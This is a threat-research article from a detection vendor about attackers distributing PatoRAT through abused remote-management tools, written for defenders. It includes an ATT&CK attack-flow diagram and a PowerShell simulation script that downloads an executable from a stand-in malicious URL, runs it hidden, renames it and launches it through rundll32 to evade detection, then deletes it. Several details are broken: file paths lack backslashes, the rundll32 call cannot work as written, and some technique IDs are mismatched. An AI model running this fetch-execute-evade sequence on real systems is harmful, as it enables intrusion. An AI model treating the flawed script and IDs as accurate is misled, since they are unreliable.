SOC Prime Bias: Critical

28 Jan 2026 11:41
newspaper icon ASEC

EndPoint Detection of Recent RMM Distribution Cases

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Follow
EndPoint Detection of Recent RMM Distribution Cases
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


Summary

Threat actors are increasingly abusing legitimate Remote Monitoring and Management (RMM) tools—such as LogMeIn, PDQ Connect, Syncro, ScreenConnect, NinjaOne, and SuperOps—to distribute malware and establish persistent remote access. Initial delivery often occurs through malicious download pages or phishing emails, followed by PowerShell-driven execution and deployment of secondary payloads like the PatoRAT backdoor. AhnLab EDR can detect the execution of these RMM utilities and generate behavior-based alerts around suspicious follow-on activity. The report underscores the importance of validating software provenance and maintaining continuous endpoint monitoring.

Investigation

AhnLab Security Intelligence Center observed multiple campaigns in which attackers repackaged or masqueraded RMM installers as popular applications (for example, Notepad++, 7-Zip, and Telegram) and delivered them via malicious websites or phishing attachments. After installation, the RMM agents registered to their vendor infrastructure and were then used to run PowerShell payloads that dropped PatoRAT. Similar tradecraft appeared across several RMM products, including Syncro delivered through phishing with PDF lures. AhnLab EDR detection logic was developed to flag execution of these otherwise legitimate binaries and correlate it with post-install behaviors.

Mitigation

Verify download sources, validate code-signing certificates, and compare hashes against official vendor releases before allowing RMM software in the environment. Enforce application allow-listing and require explicit approvals for RMM execution. Monitor for unexpected RMM binary launches, anomalous PowerShell activity, and suspicious connections to vendor infrastructure domains when such tools are not sanctioned. Keep operating systems and security tooling updated to reduce exposure.

Response

When a suspected RMM execution is detected, isolate the host, collect forensic artifacts, and remove the unauthorized binary. Block outbound connections to the tool’s infrastructure to cut off remote control channels, and perform a full scan for secondary payloads such as PatoRAT. Update detection content with observed IOCs and brief the SOC on the campaign patterns for faster triage.

"graph TB %% Class Definitions classDef action fill:#99ccff classDef technique fill:#ffcc99 classDef tool fill:#c2f0c2 classDef malware fill:#f9d5e5 %% Nodes node_initial_access["<b>Action</b> – <b>T1204 User Execution</b>: Victims download RMM installers disguised as legitimate software or open phishing PDF invoices that redirect to malicious links."] class node_initial_access action node_masquerading["<b>Technique</b> – <b>T1036.008 Masquerading</b>: Installers and PDFs are forged to appear as trusted utilities or documents."] class node_masquerading technique node_rmt_install["<b>Tool</b> – <b>Name</b>: Remote Access Tools such as LogMeIn Resolve, PDQ Connect, Syncro, ScreenConnect, NinjaOne, SuperOps."] class node_rmt_install tool node_powerShell["<b>Technique</b> – <b>T1059.001 PowerShell</b>: Attacker runs PowerShell commands via the RMM platform to download and install the PatoRAT backdoor."] class node_powerShell technique node_patoRAT["<b>Malware</b> – <b>Name</b>: PatoRAT backdoor."] class node_patoRAT malware node_software_deployment["<b>Technique</b> – <b>T1072 Software Deployment Tools</b>: RMM solutions are leveraged to push additional malicious payloads and maintain persistence."] class node_software_deployment technique node_lateral_exploit["<b>Technique</b> – <b>T1210 Exploitation of Remote Services</b>: Compromised RMM tools are used to open remote sessions and move laterally across the environment."] class node_lateral_exploit technique node_rdp_hijack["<b>Technique</b> – <b>T1563.002 Remote Service Session Hijacking</b>: RDP hijacking is performed to gain control of additional hosts."] class node_rdp_hijack technique node_root_cert["<b>Technique</b> – <b>T1553.004 Install Root Certificate</b>: PowerShell commands install a malicious root certificate to evade security controls."] class node_root_cert technique %% Connections node_initial_access –>|leads to| node_masquerading node_masquerading –>|leads to| node_rmt_install node_rmt_install –>|uses| node_powerShell node_powerShell –>|installs| node_patoRAT node_patoRAT –>|enables| node_software_deployment node_software_deployment –>|facilitates| node_lateral_exploit node_lateral_exploit –>|enables| node_rdp_hijack node_powerShell –>|executes| node_root_cert "

Attack Flow

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic. Abstract or unrelated examples will lead to misdiagnosis.

  • Attack Narrative & Commands:
    An attacker delivers a phishing email containing a malicious attachment. The attachment executes a PowerShell script that downloads the RMM binary LogMeIn.exe to C:Temp. To evade the name‑based detection, the attacker renames the binary to tool.exe and launches it via rundll32.exe (T1216). The RMM binary then contacts the attacker-controlled C2 server and drops a backdoor payload. After execution, the attacker deletes the binary (T1542.004) to cover tracks.

  • Regression Test Script:

    # ---------------------------------------------------------------
# Simulate RMM tool exploitation (original name) – should trigger
# ---------------------------------------------------------------
$rmmPath = "C:TempLogMeIn.exe"
Invoke-WebRequest -Uri "https://example.com/malicious/LogMeIn.exe" -OutFile $rmmPath
Write-Host "[*] Executing original RMM binary (expect alert)..."
Start-Process -FilePath $rmmPath -WindowStyle Hidden
Start-Sleep -Seconds 10

# ---------------------------------------------------------------
# Simulate evasion by renaming and proxy execution – should NOT trigger
# ---------------------------------------------------------------
$evasionPath = "C:Temptool.exe"
Rename-Item -Path $rmmPath -NewName "tool.exe"
Write-Host "[*] Executing renamed RMM binary via rundll32 (evasion)..."
$rundll = "$env:SystemRootSystem32rundll32.exe"
Start-Process -FilePath $rundll -ArgumentList "`"$evasionPath`",#1" -WindowStyle Hidden
Start-Sleep -Seconds 10

# ---------------------------------------------------------------
# Clean‑up artifacts
# ---------------------------------------------------------------
Write-Host "[*] Cleaning up binaries..."
Remove-Item -Path $evasionPath -Force -ErrorAction SilentlyContinue
Write-Host "[*] Simulation complete."

  • Cleanup Commands:

    # Ensure any leftover processes are terminated
Get-Process -Name "LogMeIn","tool" -ErrorAction SilentlyContinue | Stop-Process -Force

# Remove any downloaded files (if they still exist)
Remove-Item -Path "C:TempLogMeIn.exe","C:Temptool.exe" -Force -ErrorAction SilentlyContinue

Join SOC Prime's Detection as Code platform to improve visibility into threats most relevant to your business. To help you get started and drive immediate value, book a meeting now with SOC Prime experts.

Join for Free